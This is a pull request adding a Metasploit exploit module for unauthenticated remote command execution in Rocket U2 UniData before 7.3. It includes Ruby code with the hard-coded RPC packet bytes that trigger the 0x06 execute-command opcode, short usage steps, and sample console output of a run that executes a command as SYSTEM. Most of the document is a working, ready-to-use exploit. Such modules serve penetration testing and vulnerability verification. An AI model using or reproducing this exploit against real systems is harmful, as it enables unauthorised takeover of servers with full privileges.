### PR TITLE
Add Rocket U2 Unidata Arbitrary Command Execution Exploit

### DIFF
--- a/modules/exploits/multi/misc/rpc_unidata_command_exec.rb
+++ b/modules/exploits/multi/misc/rpc_unidata_command_exec.rb
@@ -1,0 +1,113 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Rocket U2 UniData Less Than 7.3 unidata72 RPC Interface Call Parsing Arbitrary Command Execution',
+      'Description'    => %q{
+         The UniData RPC server listening on the remote host does not enforce
+         authentication on the unidata72 interface. A remote, unauthenticated
+         attacker can exploit this issue and execute arbitrary code on the host
+         as a privileged user.
+        },
+      'Author'         =>
+        [
+          'Ron Bowes', # Initial vulnerability discovery
+          'Justin (Jaywalker) Williams' # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'OSVDB', '82942' ],
+          [ 'BID', '53974' ],
+          [ 'URL', 'http://bot24.blogspot.com/2012/06/authentication-bypass-in-unidata-leads.html'],
+          [ 'URL', 'https://www.upsploit.com/index.php/advisories/view/UPS-2012-0012']
+        ],
+      'Platform'       => %w{ unix win },
+      'Arch'           => ARCH_CMD,
+      'Payload'        =>
+        {
+          'BadChars' => '',
+          'DisableNops' => true,
+          'Compat'      =>
+            {
+              'PayloadType' => 'cmd',
+            }
+        },
+      'Targets' =>
+      [
+        [ 'unidata72', { } ]
+      ],
+      'Privileged'     => true,
+      'DisclosureDate' => 'Jun 09 2012',
+      'DefaultTarget'  => 0))
+
+    register_options(
+      [
+        Opt::RPORT(31438)
+      ], self.class)
+  end
+
+  def check
+    connect
+    response = run_command(sock, "echo VuLnErAbLe")
+    disconnect
+
+    if response =~ /VuLnErAbLe/
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
+    end
+  end
+
+  def send_msg(sock, data)
+    sock.put(data)
+    data = ""
+    begin
+      read_data = sock.get_once(-1, 1)
+      while not read_data.nil?
+        data << read_data
+        read_data = sock.get_once(-1, 1)
+      end
+    rescue EOFError
+    end
+    data
+  end
+
+  def run_command(sock, command)
+    msg = ''
+    cmd = command
+    if cmd.length < 12
+      len = 12 - cmd.length
+      len.times { cmd << "\x00" }
+    end
+
+    # Our command packet header. The \x06 optcode means "Execute system command"
+    msg << "\x6c\x02\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x02\x00\x00\x00\x06"
+    msg << cmd
+
+    # Send our hello and request start of unidata72 interface
+    send_msg(sock, "\x6c\x02\x00\x00\x00\x00\x00\x14\x00\x00\x00\x00\x02\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x09\x00\x00\x00\x02udadmin72\x00\x00\x00")
+    # Send our exploit
+    response = send_msg(sock, msg)
+    return response
+  end
+
+  def exploit
+    connect
+    print_status("#{rhost}:#{rport} - Attempting to run command...")
+    response = run_command(sock, payload.encoded)
+    data = response[44, (response.length - 44)]
+    print_line("Command Response:\n#{data}")
+    disconnect
+  end
+end


### PR DESCRIPTION
This module makes use of a 2 year old vulnerability in Rocket U2 Unidata, originally discovered by Ron Bowes of Tenable Network Security.

The exploit allows a remote attacker to execute arbitrary system commands as root (on *nix) or NT\System on Windows. This vulnerabilty exists due to the fact that Rocket U2 Unidata < 7.3 does not require an authentication packet prior to using the 0x06 opcode for command execution.
- Homepage: www.rocketsoftware.com/products/rocket-unidata
- Tested on: Version 7.2 on Windows Server 2003
- Usage:
  - Find a system running Rocket U2 Unidata version 7.2 or before
  - Set the RHOST and PAYLOAD
  - Exploit!

![rpcunidata](https://cloud.githubusercontent.com/assets/117990/5308372/39304e4a-7bd3-11e4-9e14-330c59891015.png)
## Example Output

```
msf > use exploit/multi/misc/rpc_unidata_command_exec
msf exploit(rpc_unidata_command_exec) > set RHOST 10.1.114.111
RHOST => 10.1.114.111
msf exploit(rpc_unidata_command_exec) > set PAYLOAD cmd/windows/generic
PAYLOAD => cmd/windows/generic
msf exploit(rpc_unidata_command_exec) > set CMD ftp -h
CMD => ftp -h
msf exploit(rpc_unidata_command_exec) > info

       Name: Rocket U2 UniData Less Than 7.3 unidata72 RPC Interface Call Parsing Arbitrary Command Execution
     Module: exploit/multi/misc/rpc_unidata_command_exec
   Platform: Unix, Windows
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2012-06-09

Provided by:
  Ron Bowes
  Justin (Jaywalker) Williams

Available targets:
  Id  Name
  --  ----
  0   unidata72

Basic options:
  Name   Current Setting  Required  Description
  ----   ---------------  --------  -----------
  RHOST  10.1.114.111     yes       The target address
  RPORT  31438            yes       The target port

Payload information:
  Avoid: 0 characters

Description:
  The UniData RPC server listening on the remote host does not enforce 
  authentication on the unidata72 interface. A remote, unauthenticated 
  attacker can exploit this issue and execute arbitrary code on the 
  host as a privileged user.

References:
  http://www.osvdb.org/82942
  http://www.securityfocus.com/bid/53974
  http://bot24.blogspot.com/2012/06/authentication-bypass-in-unidata-leads.html
  https://www.upsploit.com/index.php/advisories/view/UPS-2012-0012

msf exploit(rpc_unidata_command_exec) > check
[+] 10.1.114.111:31438 - The target is vulnerable.
msf exploit(rpc_unidata_command_exec) > exploit

[*] 10.1.114.111:31438 - Attempting to run command...
Command Response:

Transfers files to and from a computer running an FTP server service
(sometimes called a daemon). Ftp can be used interactively.

FTP [-v] [-d] [-i] [-n] [-g] [-s:filename] [-a] [-A] [-x:sendbuffer] [-r:recvbuffer] [-b:asyncbuffers] [-w:windowsize] [host]

  -v              Suppresses display of remote server responses.
  -n              Suppresses auto-login upon initial connection.
  -i              Turns off interactive prompting during multiple file
                  transfers.
  -d              Enables debugging.
  -g              Disables filename globbing (see GLOB command).
  -s:filename     Specifies a text file containing FTP commands; the
                  commands will automatically run after FTP starts.
  -a              Use any local interface when binding data connection.
  -A              login as anonymous.
  -x:send sockbuf Overrides the default SO_SNDBUF size of 8192.
  -r:recv sockbuf Overrides the default SO_RCVBUF size of 8192.
  -b:async count  Overrides the default async count of 3
  -w:windowsize   Overrides the default transfer buffer size of 65535.
  host            Specifies the host name or IP address of the remote
                  host to connect to.

Notes:
  - mget and mput commands take y/n/q for yes/no/quit.
  - Use Control-C to abort commands.

[*] Exploit completed, but no session was created.
msf exploit(rpc_unidata_command_exec) > 
```
